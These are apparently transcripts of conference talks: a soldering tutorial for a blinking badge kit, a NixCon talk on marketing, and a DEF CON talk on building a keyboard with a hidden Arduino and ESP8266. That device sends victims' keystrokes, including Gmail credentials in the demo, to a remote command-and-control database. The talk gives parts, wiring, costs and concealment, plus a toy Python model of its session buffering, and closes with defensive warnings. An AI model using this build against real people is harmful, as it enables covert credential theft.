In the beginning, you really don't need to worry about that too much. You can just clean it with a tissue, or just don't worry about it too much for a board like the one we're going to do today, but when you start making circuit boards you want to be able to keep for a while, you'll want to be able to take that residue off, and we'll discuss why you want to do that. So you'll want whatever solvent you're going to use for that, like I said, isopropanol is usually fine, and maybe a little brush or something. And at some point you're going to want to have flux that you can deliver to the board. So flux is the thing that cleans the work; it cleans the surface that you're going to be soldering on. It also breaks the surface tension of the solder when it's liquid so that it can flow a little easier, so it's a cleaner and a flowing agent, and flux is just kind of important. I have heard some people refer to flux as grease; if you've heard people say that, that's what they mean, but it's not grease. It comes as a liquid or gel, or it comes in little pen dispensers that look like a fat magic marker. A lot of people these days really like the gel; that's become readily available. I usually use the liquid, just because that's what I've always used, and I get a little dispenser bottle. Let me see if I have one of these, a little dispenser bottle. These are extremely inexpensive, so you can have a few of them loaded up, and you can see the flux that I have in there is a liquid. So you're going to want some flux. Like I said, there are a bunch of different kinds of flux. The most basic kind of flux is rosin. I don't know if it says it on here. It says flux on there; I don't know if you can see it, it's very tiny. But for the most part, all the solders you're going to use, and we'll discuss the solder in a second, are rosin core, meaning they have rosin flux inside the solder.
So when you're using the solder, it's kind of auto-fluxing, it's self-fluxing, so you don't need to apply flux from a pen or a bottle, but as you get a little more advanced in soldering, you're going to want to have flux. For the very beginning, using the flux that's inside the solder is totally acceptable. You'll be able to get away with doing a lot of work just using the flux that's inside the solder, but I'll speak more to that in a minute. There are some things you have to keep in mind when you're using the flux in the solder. That flux is what sometimes leaves a residue on the board when you're done soldering, and you might want to clean that off, because of the way the flux cleans the surfaces: it's usually an acid. It's not a super strong acid, but it's acidic. That's great when you're trying to solder, because it'll clean the oxidation and dirt and oils off of the work so that your solder will flow, but if you leave it sitting on there for a long time, it might eat into the board a little bit or pit the surface, and plus it just usually looks a little yucky, so it's kind of nice to clean it off. But for your first few projects, and certainly for this first badge buddy, don't worry about that. Just know what flux is. At the point where you want to start cleaning flux or using a separately applied flux, other than just the flux core in the solder, it'll come to your mind that, oh, I want this other thing, and you can worry about it then. You don't need to worry about that right now. But yeah, as far as the solder goes, there are a lot of different options when it comes to solder. The basic option is a tin-lead alloy; a lot of people call it 60/40, although there are slight variations. They're not always exactly 60/40. I think it's 60% lead, 40% tin, or it might be the other way around. I'm not sure, but let's see, it might tell us on here. 60% tin, 40% lead.
That's kind of the basic solder. Like I said, it has a flux core in it, and this one right here, you can see it's fairly thin. This is a 0.6 millimeter solder. I usually get 0.6 or 0.8 millimeter. I've used one millimeter before too, that's fine as well. But you generally want something that's fairly thin. If it's too thin, when you're soldering something larger, like a connector, or something that has a big heat pad, you'll find that you need to use a long length of it. That's not a big deal, just use a little more. Some people like to have a thicker one for doing stuff like that, and then the thinner one for doing smaller work. That's nothing you really need to worry about right now. One thing I do want to comment on is that a lot of people get caught up in lead-free solder. And of course, we'll talk about safety in a little bit. Lead is a potentially toxic substance, so if you're concerned about it, you can use lead-free solder. I don't. Most people that are really into soldering really hate lead-free solder. It has a much higher melting point, it's very annoying to work with, and it's really hard to rework. It's just not the best thing in the world. And if you're pretty careful, you shouldn't be sticking soldered wires or circuit boards in your mouth anyway, or letting children play with them. You don't get lead inside of you simply by touching it. You have to touch it and then lick your hands, or you have to chew on the thing that has the lead on it. Lead doesn't just float up in the air. So of course, if you're working somewhere and they have safety policies on this, read your safety data sheets and all that, that's not my expertise. But I can just tell you that most people that are soldering experts prefer to use the standard 60/40 leaded solder. It's just much, much easier to work with, and the lead-tin alloy has a very low melting point. So anyway, those are the kinds of solder you need.
Speaking of melting point, if your soldering iron has an adjustable temperature on it, a common question is, well, what do I set that at? I usually set mine right at about 350 degrees. That's Celsius. Maybe a little higher than that sometimes, and that works out to about 660 Fahrenheit if you have an older rig that has a Fahrenheit rating on it. So yeah, just kind of keep in mind 350, 360, something like that. And you can go a little lower if you're working on something really fine and you're worried about heating it up too much, or a little higher if you're soldering some big screw lugs or something that needs a lot more heat delivered. If you kind of sense that your tip is getting cooled too quickly, you might want to just turn the temperature up a few degrees. So remember that 350C or 660F will kind of keep you in the right range for melting the lead-tin alloy solder. If you decide to use lead-free solder, you're going to need to go up a little bit, and you can find the specifications for whatever solder you're using. It'll usually have a melting point and then a specified tip temperature, and the tip temperature needs to be much higher than that melting point. All right, so yeah, soldering irons are really hot. We joked before about the chicken thing. I'm going to mention it a few times, because you just want to be careful not to burn yourself. There are a few safety points to keep in mind here. That's probably the one that we almost don't need to mention. I mean, we're melting metal. Of course it's hot. Don't stick your fingers in it. Don't clean it on your tongue. All those things, right? So just remember it's hot. We're going to have four safety points. The first one is heat. Don't burn yourself. Don't burn your desk. Don't start a fire. Just remember it's hot. Number one, heat. Number two is fumes.
A lot of people think this has something to do with the lead. It doesn't. It's when you're soldering, there's that rosin core in there and the flux, that rosin core, it will gas off. It'll make kind of a smoky smoke and you don't want to breathe that. All right? So you want to have a little, what I have on my workstation is I actually just have a small fan and it just kind of blows into the corner because that smoke, that residue, it'll settle very quickly. So if you just blow it away from your work, that's probably fine. I don't recommend this, but I've actually noticed even with my fan on just because I've been soldering for so long, when I solder, every once in a while, I'll just go, and I'll just blow the smoke away. If the smoke is rising up into my face, I don't want to inhale it. So I just, and then I inhale. Probably not smart, probably not safe. Just keep the fan on. You can buy a really nice little fume extractor hood that has a little, like a filter, I think it's a charcoal filter in it that keeps the, gets the soot trapped and it's very nice. So if you're going to solder a lot, you might want to get one of those. You don't want to be breathing those fumes, okay? So number one was heat, number two was fumes. Number three is lead. We already talked about the lead. So when you're soldering with lead solder, lead can get on your hands, just like, you know, if you were touching a lead pipe or something like that. Also, little bits of lead break off. I think it's called dross and, you know, maybe even, they're almost microscopic. Sometimes they are macroscopic, but, and you'll even notice little bits of little tiny balls of solder around your, your work area after you've soldered a lot. That stuff is called dross. And if that's sticking on your hands and then you lick your finger or you eat your lunch and haven't washed your hands, that lead can get in you. That is particularly a problem for children. 
So if you're soldering in an area where there are children, you want to clean that lead up, right? After you work with leaded solder, you need to wash your hands, okay? And this isn't a hand sanitizer situation, because you're not trying to kill bacteria or something. You're literally trying to wash a metal away and get it off of your hands so that it doesn't get in your mouth and your stomach, okay? And also, if you have these little dross bits around and a child comes through your work area, they might drop a toy somewhere where you have these little dross droppings and put it in their mouth. Or if you've recently soldered something, they might say, oh look, that's a cool badge buddy, and stick it in their mouth. That's not cool. You don't want to get lead inside you. You do not want a child getting lead inside them, okay? It's not that big of a deal, there are other things in your house that are lead, but you do not want little chunks of lead that break off of things sitting around. Just wipe it up with a wet wipe. Wash your hands, clean it up. Just keep it clean. Don't get this lead around the place. Wash your hands after you work with leaded solder. All right, so heat, fumes, lead, right? Those are three things. And then this last one is huge, because people just don't think about it that much, but please wear safety goggles. You don't want to fling a little drop of hot solder in your eye. A really big thing is when you're cutting your leads off, especially ones that might be a little thick, and the lead flies off and it hits the wall, and you're always like, oh, well, that sounded nice. Well, that doesn't sound nice if it hits you in the eye. All right, you only get two eyes. You probably want to keep both of them.
So protect them, wear some eye protection, all right? You only get those two eyes. All right, so great. So let's actually get to the soldering now that we've covered sort of the theoretical background stuff. I guess this might be a good time for me to say there are a lot of great soldering videos out there. If you just get on YouTube and look for things about soldering, you'll hear mostly all these things I already said, but maybe you'll pick up some other pointers, and sometimes it's good to hear things explained by different people. So if you like soldering and want to get better at it, definitely watch some other videos. We're only going to barely touch on, for example, surface mount soldering, so there are some great surface mount soldering videos out there that you can find. So that's a nice segue to our next thing. I like to think of there being three styles of soldering, two of which we're going to do here today. There's through hole soldering: when you have a hole in a circuit board, it's called a plated through hole, and you put a wire or a post through it and then you solder it into that hole. Right? And then there's surface mount soldering, where you have a pad on a circuit board and you solder something onto that pad, so it doesn't go through the board, it just solders onto the surface. When you see these really large chips that have many tens or even hundreds of little leads sticking out of the sides, those are all surface mounted, or these little tiny resistors that look like little rectangles that don't have any wires, those are surface mounted. Today we're going to do one really big surface mount thing, and that's our battery clip, but it gives you the idea of what surface mounting is, so it's a nice exposure to that. So we have through hole and surface mount. Through hole is sometimes called TH.
Surface mount is often called SMT, surface mount technology. And then the third thing is just, I guess I might call it point-to-point soldering and it's when you just solder two wires together, you usually strip the two wires, twist them together and then solder them and making sure you get solder flowed completely into the joint. Another example of that kind of point-to-point soldering is when you're soldering a wire into a connector or something like that. So that isn't exactly through hole and it's not exactly surface mount, it's just a different kind of soldering. But you know, if you always think of those three things, they all kind of work the same, but they all have little, you know, differences that, and it's nice to make sure you get some practice in doing all three of those. All right, so let's get right into this example. Actually, first let me just say, you know, the, so the basics of soldering are, and we've already touched on this a little bit, so I'm gonna say these things a few times just to make sure they really sink in. So you have two, let's say, let's say you just have two surfaces, you either have the hole with the wire in it, which is, you know, the hole is a surface and the wire is a surface for through hole, or you have pad with a terminal of a component sitting on the pad if it's surface mount. So, but there's usually two things, right, the pad and the lead or the hole, the through hole and the lead, the plated through hole and the lead, and what you want to do is heat up the junction, so those both of those things, you want to heat both of the things you're trying to connect hot enough so that solder will flow onto them. All right, so there's a few things that you're trying to do all at once here, so when you go to heat them, you need to have some solder between the soldering iron and the connection, and this is not the solder that you need to flow into the connection later, this is just the thermal connecting solder. 
So, you have the two components sitting together, so often what you'll do is you'll have the two components, you know, near each other in some way, they're next to each other, either inside of each other, sitting on top of each other, so you put the iron near them, get a little solder on it, on the iron, just so that that solder can touch to the work and conduct heat into the work, right, so that's not the solder that makes the connection, it's the solder that is used, it's solder that's used to enable the connection to be made by allowing the soldering iron to then heat the items up, right, so that first little bit of solder you put on there, you're really putting it on the iron and it heats up the two items, right, that heats up the work, let's call it the work, and then once the work is hot enough, it's up to that melting point of solder, then you touch the solder to the work, not to the iron, and the work will melt the solder onto itself, and that's how you get a beautiful, nicely flowed solder connection, where the solder flows onto the work and is not just kind of being brushed on there by a soldering iron, alright, so again you don't, you do not use the soldering iron to apply the solder, you use the soldering iron with a little preliminary bit of solder on it to heat up the work enough so then the solder melts onto the work, right, so anyway that's a thing that, you know, when you get it, when you get that really nice flow of the solder on something, when you have the metal really hot and then the metal melts the solder, not the soldering iron, the soldering iron really heats the metal up, the trick is you need a little solder initially to be able to get the heat from the soldering iron into the metal or the work, so that's one of the main things you're doing there, the other thing is remember your solder has your, especially, you know, if you're using, you don't have a bottle of flux, you're just using a Rosincorps solder, your solder has your flux in it, 
so you need to be adding solder, I don't want to say constantly, but the process of making the solder connection, you need to be adding solder because the flux comes out when you melt the solder, all right, so before you make the connection between the two pieces of metal, then those surfaces need to be, they need to have flux on them, so you have to melt the solder in their vicinity so that the flux gets on them and then that allows the solder to flow onto them, so the two things kind of happen at once, the heating and flowing of solder and the application of flux because they're coming in the same delivery package, right, the strand of flux you're using has the Rosin, the strand of solder you're using has the Rosin flux inside of it, okay, and another important thing about that is sometimes when you get solder on a connection and you're moving around or you're still working the connection in some way, the smoke that came up, that's your flux burning, it's your flux boiling off, that smoke that came up, they got sucked away or that, you know, if you followed my incorrect instructions you blew away, so now that flux is gone, okay, so that's one of these things where you need to add more solder because the solder has the more flux in it, right, so if you're continuing to work the item you only have so long before your flux is gone, okay, and then, you know, if you get to the point where you've melted a bunch of solder on it and there's this big mess, you need to take the solder away, which sometimes you can just lift it off with iron, it'll stick on the iron and you can, you know, clean it on your sponge or your metal tip cleaner, and then you can apply some more fresh solder, which will have new flux in it, releasing a little more smoke, so this is part of that thing I said where you need to be always ready to put a little more solder on because you need the solder because it conducts the heat, you also need the solder because it has the flux inside of it, and the 
flux doesn't stick around, you only get a few seconds to use to flux the surface with the solder, that's why, you know, you need to keep adding more solder, even if then you get to the point where there's too much metal on there, too much solder, you just pull it off, just clean it off, you're gonna need the flux, and when you get a little more advanced with this stuff and you're doing a lot of connections, you know, really small packages that have a lot of pins, that's where you just want to get a bottle of flux and just drench the thing with flux or put gel flux on it so it's all soaked with flux because then you can work it, you can move the solder around, you can add and remove solder, and the flux is still there doing its job of cleaning and breaking the surface tension of the molten solder. So this is the badge buddy, comes in a Ziploc bag like this and there's some stickers in there, if you got this during Defcon 28, we did some sticker swapping, so there's a bunch of different stickers in here from lots of our friends and members in the community and other vendors, and you see such as Hack 5 and Hacker Warehouse and just random stickers, so that's lots of fun. And, you know, let's see, yeah there's some good ones in here, yeah there's the Hack 5 sticker, a couple Hacker Boxes stickers, hologram sticker, yeah Hacker Warehouse gave us these, they have some little camera covers on them to keep your camera safe. So, all right, the parts that are in here are fairly basic and represent opportunity to do a little bit of surface mount and also some through hole soldering. There's a bead chain that you can use to connect the badge buddy to your lanyard or your backpack or whatever when you're done. There's a coin cell battery, it's a lithium battery, a CR2032, it's pretty common lithium battery coin cell. That's the clip that holds the coin cell onto the back of the PCB. All right, let's get these things out of our way here. 
We solder these four items to the PCB, the circuit board with the logo on it. There's the HackerBoxes logo; his name's Bit Head or Circuit Head, depending on which version he is. We're going to get some solder out, and we're going to start by tinning the tip of the soldering iron. This one's already tinned because we use it a lot, and then we're going to tin these three pads, these surface mount pads on the board. You want to always keep the tip of your soldering iron tinned, keep some solder on it; the flux will help clean it, and every time you see the soldering iron going off the screen here, that's just me cleaning the tip in a tip cleaner. So we're going to tin these three pads by getting some solder flowed onto them, and again, we're not just melting it on there, it's actually bonding into the pad, with the solder that's already on the pad from the manufacturing process. And when you're surface mount soldering, well, with any soldering, you really want to pay attention to the orientation. This little clip is oriented according to the white paint on the board; that's called the silkscreen.
So the board has been silkscreened with these positioning indicators, and most boards have this. When you lay out a circuit board you can design the silkscreen, so the silkscreen shows you which direction the battery holder goes in. In this case you could put it the other way, it's just a little harder to put it in, so we intentionally oriented it so the clip opens downward. So now what we're doing is I'm getting solder to flow onto the little wings on the side of this battery clip, this battery holder, and we're actually heating the clip up enough so that solder flows onto it. So remember, we need a little solder on there just to conduct into the metal of the clip, and then you can see the solder flows really nicely, it makes a nice shiny surface. So you want to make sure when you're soldering you always end up with a shiny surface that flows neatly onto all of the metal around it, and that lets you know you do not have what's called a cold solder joint. If you just dump hot solder on a cold metal, it won't flow onto the metal and it won't bond, and that will be a cold joint, which is mechanically unstable and can be broken off pretty easily, and you never want that. That's like the most important thing to avoid while you're soldering, getting cold solder joints. But you can see these are nicely flowed, well, it's called wetted, the solder is fully wetting the board. So yeah, the indicator on the silkscreen for the LEDs shows the flat side. The LED has a flat side on it, and the flat side goes to the short pin, so the short pin goes through the board so that it lines up with the flat side on the silkscreen. You see this right here, so this is an example of through holes, see, we're putting the leads through the holes, we're going to solder them on the other side, and you usually just bend the leads a little bit to hold it in place. But then also we're going to set the board down component side down, which will hold the
pieces into place, and that's why when you're soldering you often start with the lowest altitude, or the lowest thickness, parts first, because then as you flip it over you can get the table to help you hold them into place, and then things just don't get in your way when you do that. So again, here we're just flowing solder. We're using a little tiny bit of solder to heat up the joint, and then getting the solder in there so that the heat of the joint melts the solder into the joint. And there are just four little through hole posts here, it's actually quite easy, and you can see I'm moving pretty quickly because, like I said earlier, you want to be able to use the flux, and the flux will disappear over time. It's not smoking anymore because the flux is gone. So while the flux is still in there you want to get the work done, so you do want to move as quickly as possible without creating errors or making a mess. All right, now we're going to cut the leads off. This is where you need to be wearing your safety goggles. And then some people like to go back, I usually like to do this, and hit the cutoff part with the soldering tip again, just to smooth out the wound that was left behind by the cutter, just to get it nice and smooth, but that's your option. And the switch is also through hole. You can put it on the front or the back. Since it doesn't really matter, putting it on the back means you don't have to see it, and it leaves the board looking kind of nifty. So you can just push it through those three holes here, if I can get that stuck in there right. The leads are really short on that switch, and so here's a good example where you want to get one of the pins soldered, just get one soldered here, and then maybe check and make sure the component is lined up, because while only
one pin is soldered, you can reflow it very easily and move the component around a little. This is important when you're doing something like a chip that has a lot of pins: you just get a corner tacked down, and then you can move the chip around just a little bit by just reflowing that corner, and then once everything's lined up you can go ahead and solder down the rest of them. But it's even useful for just a little switch like this. There's a lot of play in those holes, you can move the switch around a bit, so it just helps you line it up nice and straight. All right, solder all three pins of those, and that switch is just an on-off switch, it just opens the circuit between the battery and the two LEDs. And now these are not just regular old LEDs, they actually have a little circuit inside each of them. They're in a 5 millimeter LED package, but there's a little circuit in there that actually cycles three different LEDs inside the package. So each of those packages, while it looks like one LED, is actually three LEDs and a little circuit that will make some cool flashing patterns. And we're going to get this coin cell open, a lithium coin cell, a CR2032, it's a pretty common lithium coin cell battery, and I'll show you how to install that. These are packaged really well, because the manufacturer of the batteries doesn't want them shorting out and causing any trouble, so they completely encapsulate the battery to keep it safe.
Anyway, we take that and we flip the positive side up. I'm going to show you, there's a little plus on the top. Flip the positive side up, and that obviously means the bottom is ground, and then slip it in there. Part of the reason why we tinned that pad underneath the clip is because the center pad actually becomes the terminal. And there you go, that's a badge buddy, nice beautiful blinking lights. It's very colorful, and the lights blink quickly and then slowly at different speeds, and if you leave it on for a few seconds the colors will get out of sync, which makes it look a little more discotheque. It's pretty cool. Okay, so that was pretty cool. I said we would talk a little bit, just give you some of the keywords, about removing solder. If you need what's called rework, meaning something's already soldered and now you need to rework it or reflow it, you need to heat the solder up so that you can take the parts apart. Sometimes you want to remove the solder, so you can use this thing called solder braid, which is basically just this really finely braided wire that has a lot of flux in it, and if you just put it between your iron and a piece of work, once it gets warm it'll kind of draw the solder out of the work. You can also use a solder sucker, one of these guys right here. So you create a vacuum in there, and then when you trigger it, it sucks the solder out. And I wanted to point out, when I did that, a couple little chunks of solder and flux flew out of there, and you do not want to eat that or leave it where a child might eat it, okay? If you get that on your hands like I just did, you want to wash it off before you eat, or floss, or whatever you might do that might get in your mouth. All right, so: braid and suction. And just remember, you're going to need more solder with either of those things you're doing. You might need flux again. You'll figure these things out as you get to them, just
don't be afraid to use more solder, don't be afraid to get some flux going on things when you need it, or add more solder to get the flux melted in there. All right, so hopefully this was useful. There are a lot of resources online you can find about soldering, and if you have any questions, hit us up here at HackerBoxes. And like I said, I hope that was interesting, and I hope you're open to soldering some more projects. We sell a lot of kits at hackerboxes.com, and there are a lot of fun things out there to solder even if you don't get them from actual kits, things that you might want to rework or modify or try to repair. Like I said, it's a very handy skill. I hope you enjoy it. Thanks for spending this time with us. Take care.
Learn to Solder with HackerBoxes. Assemble your very own BadgeBuddy. HackerBoxes has updated a special edition BadgeBuddy soldering kit for DEF CON 28 SAFE MODE. The BadgeBuddy is a simple and fun kit to introduce basic soldering skills. Once assembled, the blinky mini-badge PCB can be hung from a conference lanyard, backpack, purse, belt, etc using the included bead-chain. The BadgeBuddy uses self-cycling rainbow LEDs for a reduced bill of materials requiring no external control circuitry. The result is a very nice colorful effect that is still simple enough for a first time soldering project. As in past years, the BadgeBuddy is free (as in beer) and in light of DEF CON 28 SAFE MODE, HackerBoxes will send it directly to you, anywhere in the United States, for only $1 S&H. If you do not already have soldering tools on hand, HackerBoxes is also making a set of basic soldering tools available at cost. Both can be found at HackerBoxes.com and can be ordered now to ship starting on July 20. Orders as late as July 25 should still be received in time for DEF CON 28 SAFE MODE, but earlier is always better in light of recent postal delays.
10.5446/50654 (DOI)
Okay, welcome to a talk on KeyPress Hack by Farid Perez, Mauro Eldridge and Luis Ramirez from DC5411. Before we start I would like to make a brief introduction to both our talk and the speakers. My name is Mauro Eldridge, I'm an Argentine hacker and I work as a cybersecurity architect. I'm the founder of DC5411 Argentina and I was a speaker at DEF CON, DEF SIGIRIA, Roadsec Brasil, DragonJAR Colombia, POSCO NAYRAN, and Texas Cyber Summit, among other conferences. Now my co-speakers are going to introduce themselves. Thank you Mauro. Hello everyone, my name is Farid Perez Aes, I am a Colombian hacker, systems engineer and master in telecommunications. I work as a professor at the University of La Guajira and I am a member of the DC5411 group. I have also been a speaker at DragonJAR Colombia, and now at DEF CON, in this village. Thank you Farid. Hello everyone. My name is Luis Ramirez Mendoza, from Colombia. I am an electronic engineer and a hacker in computer security and artificial intelligence. I'm a teacher at the University of La Guajira, a speaker at DragonJAR Colombia, and a member of DC5411. Well, the objective of this talk is to show the assembly of a bad USB device discreetly mounted inside a keyboard, with the ability to send the victim's keystrokes over the internet, like a remote keylogger. This talk focuses exclusively on the construction of this type of artifact and includes a video demo at the end. This is the tampered keyboard we are using. As you may see, it seems at first glance like a pretty normal, classical keyboard. But well, it isn't. Now my co-speakers and friends Farid and Luis are going to explain the magic behind this electronic tampering. Thank you. In the first place, we have the keyboard. You can choose any type of keyboard that has a USB connector, so that the alteration we are going to make is not very visible. The ESP8266 Wi-Fi module will allow us to connect the Arduino to an internet connection.
In order to send the keyboard data to a MySQL database, so that we have a history of everything captured on the keyboard. To optimize the size, we decided to use the Arduino Nano, so that it can be easily hidden inside the keyboard, and it handles the translation of the keystrokes to be stored in the MySQL database. A standard USB mini cable replaces the keyboard cable, since the keyboard must be connected through the Arduino, which all the information must pass through in order to implement the keylogger. To receive this information, we will host a web server with PHP, MySQL and phpMyAdmin, in order to receive all the values entered on the keyboard. We will also have the Arduino programming interface, where we will enter the code necessary to interpret each of the keystrokes emitted by the keyboard and send them to be stored in the database. In this image, the Arduino IDE interface on the PC. And something very important and very fundamental: have a lot of patience. A build like this rarely comes out right the first time, and on many occasions it does the opposite of what you expect, even more so when you are assembling the circuit and a solder joint becomes damaged or something very unexpected happens. Taking into account hardware hacking 101, we have the plans that detail completely the components used in the project. If you want to do it yourself, you must have a normal keyboard, or whatever model is used in your country, the wireless network component for Arduino, the ESP8266, an Arduino Nano and a standard USB cable, a C2 server, the Arduino programming interface on the PC, and above all, most important, a lot of patience. In this diagram, it is possible to observe the schematic of the tampered keyboard, because it represents how it is shaped and each of the components detailed previously, in order to show the respective operation for obtaining the information of each key entered by the victim.
We have the connection diagram of each of the pins, both for the Arduino Nano, the ESP8266 wireless interface for the Arduino, and the keyboard, which indicates exactly where each connection must be made for its proper operation. On the connection card for the keyboard PCB there are many drawbacks at the time of soldering and making first contact with each of the terminals of the connection. In the same way, when the membrane is not seated and not making contact, it will work irregularly, because there will not be enough contact to read each of the keystrokes. You have in the image the representation of each of the components mentioned above, for their respective assembly and operation, and an image of the aforementioned cards fully operational. Here we are verifying whether the keyboard is recognized by the computer. In the graphic we can observe that our modification did not alter the computer's recognition of the keyboard. Here we are already assembling the keyboard for the pertinent testing. When a key is pressed, it joins a row and a column on the connected card, and this signal, in addition to going to the computer, also reaches the Arduino, which takes a reading of the continuity and sends the signal to the Wi-Fi module. This is how the keyboard would look on the inside. As we can appreciate, all of the pieces are concealed and fit easily inside the device, in such a way that the victim cannot suspect anything. Here is the schematic: the Arduino and the ESP are connected over serial, which means that one transmits and the other receives every keystroke received from the keyboard board. Thirteen pins are wired to the terminals, which are the rows and the columns of the keyboard PCB. When a key is pressed, the circuit closes: the row and the column come into contact. The Arduino also waits for each click, and the code then handles the translation to know which key was pressed.
The ESP also receives every keystroke via the Arduino, since the ESP itself is not connected to the PCB of the keyboard. To simplify the coding we use the Keypad library, which maintains the same principle, indicating which pins are rows and which are columns. Here we can see a part of the ESP configuration, ready and waiting for keystrokes to send them to the database. Here is where the Arduino interprets every keystroke and turns it into its respective character, to be stored in a variable which will end up in the database via a request to the C2 server. In this graphic we can observe the code that saves the information to the database. Now that you know how to build this BadUSB keyboard, let's take a look into how to use it to exfiltrate data. How does it work behind the scenes? So far we know that the keyboard is tampered with an Arduino Nano, which acts as a buffer for the user's input data. This Arduino is connected to an ESP8266, which provides it with network functions. Basically it connects to any open Wi-Fi connection to relay the data. So whenever the buffer is full, or a certain time has passed, the buffer closes itself and uploads the data by issuing an HTTP POST request to our server, the command and control server. Then on the server a PHP script is listening, parsing the data and sending it to our MySQL database. So you might ask yourself, what are all these rows, 24 to 28? These are sessions. And how does this keyboard manage sessions? Whenever the buffer reaches a certain amount of data, or a certain time of inactivity passes, the buffer will close itself, and we create what we call a session and upload it with a number. Whenever it is uploaded, the buffer will be cleared and then a new session is created. So for example here, let's take a deeper look. Here we have session 11, where the user attempts to open gmail.com. Then a certain time passes and the user jumps into another task, as you may see on session 12.
He starts writing something else, a document or an email, whatever. Then on session 13 the user came back to Gmail: he jumped back to the Gmail site and entered his or her credentials, his or her email and password. So how much will it cost to build this kind of device? Not so much, actually. We have taken into account the most expensive prices available, and even then it is not expensive at all. You can have a classic keyboard for $9 to $12, an Arduino Nano for $7 to $13, and the ESP8266, which is a very popular product, for $10 to $12. Let's suppose you want to have a cloud instance for your command and control server; it will cost something around $5 a month. So for $30 or $35 you can have your hardware hacking kit. Now it's time for a demo to see how the keyboard works in our controlled environment. I'm going to jump into conclusions and questions and answers. You have to always be wary of any new device, whether USB or not; anyone, and I say anyone, could be a victim. Let's be honest here: would you have been able to detect this tampered keyboard in your environment, for example if it was lying around the desks of your office? What makes this situation worse overall is that with a few dollars anyone could build or even buy a product of this type. Watch out for counterfeit hardware: just some days ago fake Cisco switches were found deployed in production environments, and nothing less than core switches. Think about it: if we were able to produce this apparatus with so few resources, it is safe to assume that an entity with greater resources could produce them on a large scale. So if you want to get in touch with us on GitHub, feel free to add us at Mauro Eldridge and DC5411, or on Twitter, you have our handles here. We are always happy to talk about hardware hacking and hacking in general, so don't be shy to join. And we are here to answer any of your questions, so we hope you like this talk and we are looking forward to seeing you again next year. Thank you.
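The session mechanism described above — keystrokes accumulate in a buffer, the buffer closes when it fills up or an inactivity timeout fires, the session is uploaded with an incrementing number, and a new empty session begins — can be sketched like this. (The real device does this in Arduino/ESP8266 firmware posting to a PHP script; the capacity and the in-memory "upload" list here are illustrative stand-ins.)

```python
class SessionBuffer:
    """Toy model of the keylogger's session handling: keystrokes
    accumulate until the buffer is full (or an inactivity timeout
    fires), then the session is uploaded and a new one begins."""

    def __init__(self, capacity=8):
        self.capacity = capacity
        self.session = 1
        self.buffer = ""
        self.uploaded = []  # stands in for rows in the MySQL database

    def flush(self):
        # On the real device this is an HTTP POST from the ESP8266
        # to the C2 server, carrying (session number, buffered keys).
        if self.buffer:
            self.uploaded.append((self.session, self.buffer))
            self.session += 1
            self.buffer = ""

    def keypress(self, ch):
        self.buffer += ch
        if len(self.buffer) >= self.capacity:
            self.flush()

kb = SessionBuffer(capacity=8)
for ch in "gmail.com":  # user types a URL; 9 keys overflow one session
    kb.keypress(ch)
kb.flush()              # inactivity timeout closes the partial session
print(kb.uploaded)
```

Typing nine characters with a capacity of eight produces two database rows: one full session and one short one closed by the timeout, matching the numbered sessions seen in the demo.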
In this talk we will see the assembly and use of a modified BadUSB keyboard with an integrated DIY physical keylogger. Using a built-in WiFi module, this keyboard is capable of sending user keystrokes to a remote server and storing them in a database. The piece-by-piece assembly, its diagram, and its programming will all be demonstrated. There will also be a live demo of its operation. This talk is recommended for both novice and experienced users alike.
10.5446/49873 (DOI)
Okay, next up — well actually, right now — we have How Nix Grew a Marketing Team, by Garbas. This is about marketing: non-technical work is all too often an afterthought for developers, or worse, is actually viewed as something negative. Rok really wishes this weren't the case. Having clearly defined problems, audience and strategy should be as important to us as having clean and tested code. This is important for Nix; this is important for any project that aims to succeed. If you're not familiar with Rok: he started using Nix in 2010, he is a senior engineer at Tweag.io, and he ran the first Nix sprint in Slovenia in 2013. And yeah, he's the head of the marketing team. So take it away. Hi everybody. I hope you can hear me. How do I actually know? I don't know. Not yet, because I don't hear you. Should I continue? Okay. Hi everybody, I think now you can hear me. Okay. So it's a privilege to be giving you this presentation, and I don't just say this to everybody, I really mean it. And it's for a simple reason: this concept of family, belonging, team — it's personal to me, as much as it's personal to you. In the past I did presentations at meetups and conferences, and those presentations were always at conferences of other, also great, technologies, but there was always this distance between what they do and what I do. So this talk is really special to me, because I'm talking to an audience that is just like me. I feel home here. So thank you. So today I'm going to be talking about how Nix grew a marketing team. I was always passionate about getting Nix into the hands of other developers — other people, not only developers. So after I moved to Berlin for my first Nix job — this was in 2014 — and after one year of experience of working with Nix, I wanted to do this more often. And I went to every meetup.
I tried to talk to every developer there in Berlin — and that's a lot of them — and tried to convince them to use Nix. I was partially successful, but there was always this distance, as I was saying before. And then, as it usually happens in Berlin, you go for a kebab with a fellow Nix person and suddenly you end up organizing a Nix conference. So we organized a Nix conference. And why is that important? Because there I talked about making Nix friendlier for beginners. I thought Nix was great already in the shape it was, but I wished I would be able to fix just a few things. And there were a few things that I emphasized there. One was this first contact that everybody has getting to know Nix, which is the installer and the website. So, the installer and the website. Then there was the command line — I think I was a bit too harsh, now rewatching the video. And then also the documentation. So already back then it was clear what we needed to do. And I gave a similar talk in 2018 while I was working at Mozilla and trying to introduce Nix at Mozilla — how I actually introduced it at Mozilla and what the pain points were. What I remember from that talk is that at the end I said: if there is one thing that we should actually change, it is the website. Because that was the main complaint that I received time and time again. It all boiled down — it was not the only thing, but it all boiled down — to the fact that people didn't know how to find the documentation. So the website, this entry point, was always the problem. And this passion of mine, trying to introduce Nix to so many people, got me into this really scary place. Some call it marketing. And I don't see it anymore as a scary place. But I quickly found out that many, including my past self, have a very negative view of marketing. It kind of ranges from "I don't care about it" to "marketing is evil". And actually, this is for a good reason.
Because a lot of marketing — especially the marketing we perceive and acknowledge — is actually the deceptive kind, or at least it feels that way. But that's not all the marketing there is. It doesn't have to be that way. So, yeah, it doesn't have to be this way. In my past, as I said, I was in the "I don't care" camp, where I didn't really care about marketing that much. But there was a moment, which I want to share with you, that started the process of me thinking a bit differently about marketing. And this was the moment when I encountered this number: 95% is the percentage of our behavior that is controlled by our subconscious. And that fascinates me. I knew that there was some subconscious involved in our decisions, but I thought it was lower. It's not 20%. It's not 50%. It's actually 95%. And that shocked me. And this is applicable to every human on earth; it's not something that depends on where you're from or how good an education you have. No, these forces in our subconscious actually come from evolution — that's why they are universal. And these forces we usually call human behavior. It kind of feels like there is this puppet master and we are the puppets. And even when we die, our children come, and the same puppet master controls them. I felt very uneasy. I thought I was a rational person; I thought I was an in-control person. And that turned everything on its head. But at the same time, I acknowledge that this is powerful, powerful knowledge. And, you know, with everything powerful, you can use it in a good and a bad way. And marketing, especially advertisement — I guess that's where the evil part comes from — takes advantage of 